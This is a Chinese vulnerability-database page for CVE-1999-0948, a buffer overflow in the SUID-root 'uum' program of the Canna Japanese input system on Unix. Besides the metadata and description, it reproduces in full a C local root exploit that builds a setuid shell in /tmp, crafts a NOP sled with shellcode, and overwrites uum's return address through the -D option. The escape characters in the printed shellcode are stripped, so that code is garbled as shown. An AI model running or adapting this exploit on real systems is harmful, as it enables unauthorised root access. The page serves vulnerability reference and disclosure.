Canna子系统’uum’缓冲区溢出漏洞

Canna子系统’uum’缓冲区溢出漏洞

漏洞ID 1105588 漏洞类型 缓冲区溢出
发布时间 1999-11-02 更新时间 2005-10-20
图片[1]-Canna子系统’uum’缓冲区溢出漏洞-安全小百科CVE编号 CVE-1999-0948
图片[2]-Canna子系统’uum’缓冲区溢出漏洞-安全小百科CNNVD-ID CNNVD-199911-008
漏洞平台 Unix CVSS评分 7.2
|漏洞来源
https://www.exploit-db.com/exploits/19582
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199911-008
|漏洞详情
Canna输入系统的uum程序存在缓冲区溢出漏洞。本地用户可以获得根权限。
|漏洞EXP
source: http://www.securityfocus.com/bid/757/info

Canna is a Japanese input system available as free software. Canna provides a unified user interface for inputting Japanese.

Canna supports Nemacs(Mule), kinput2 and canuum. All of these tools can be used by a single customization file, romanji-to-kana conversion rules and conversion dictionaries, and input Japanese in the same way.

Canna converts kana to kanji based on a client-server model and supports automatic kana-to-kanji conversion.

The Canna subsystem on certain UNIX versions contains a buffer overflow in the 'uum' program. Uum is a Japanese input tty frontend for Canna. Regrettably, certain versions are vulnerable to a buffer overflow attack via unchecked user supplied data with the '-D' option. Since 'uum' is installed as SUID root this may result in a root level compromise. 

/*=============================================================================
   /usr/bin/uum Exploit for Linux 
   The Shadow Penguin Security (http://shadowpenguin.backsection.net)
   Written by
    UNYUN     ([email protected])
  =============================================================================
*/
#include <stdlib.h>
#include <stdio.h>

#define RET_ADR  84
#define EXP_ADR  204
#define MAXBUF   300
#define JMP_OFS  0x484
#define NOP      0x90
#define SHELL    "/tmp/pp"
#define COMPILER "gcc"

char exec[60]= 
  "xebx1fx5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0b"
  "x89xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx89xd8x40xcd"
  "x80xe8xdcxffxffxff";

char            xx[MAXBUF+1];
unsigned int    i,ip,sp;
FILE            *fp;


unsigned long get_sp(void)
{
__asm__("movl %esp, %eax");
}

main()
{
    strcat(exec,SHELL);
    sprintf(xx,"%s.c",SHELL);
    if ((fp=fopen(xx,"w"))==NULL){
        printf("Can not write to %sn",xx);
        exit(1);
    }
    fprintf(fp,"main(){setuid(0);setgid(0);system("/bin/sh");}");
    fclose(fp);
    sprintf(xx,"%s %s.c -o %s",COMPILER,SHELL,SHELL);
    system(xx);

    sp=get_sp();
    memset(xx,NOP,MAXBUF);
    ip=sp-JMP_OFS;
    printf("Jumping address = %xn",ip);
    xx[RET_ADR  ]=ip&0xff;
    xx[RET_ADR+1]=(ip>>8)&0xff;
    xx[RET_ADR+2]=(ip>>16)&0xff;
    xx[RET_ADR+3]=(ip>>24)&0xff;
    strncpy(xx+EXP_ADR,exec,strlen(exec));
    xx[MAXBUF]=0;
    execl("/usr/bin/uum","uum","-D",xx,(char *) 0);
}
|参考资料

来源:BID
名称:757
链接:http://www.securityfocus.com/bid/757

相关推荐: IRIX Korn Shell (ksh) suid_exec缓冲区溢出漏洞

IRIX Korn Shell (ksh) suid_exec缓冲区溢出漏洞 漏洞ID 1105268 漏洞类型 缓冲区溢出 发布时间 1996-12-02 更新时间 2005-05-02 CVE编号 CVE-1999-1114 CNNVD-ID CNNVD-…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享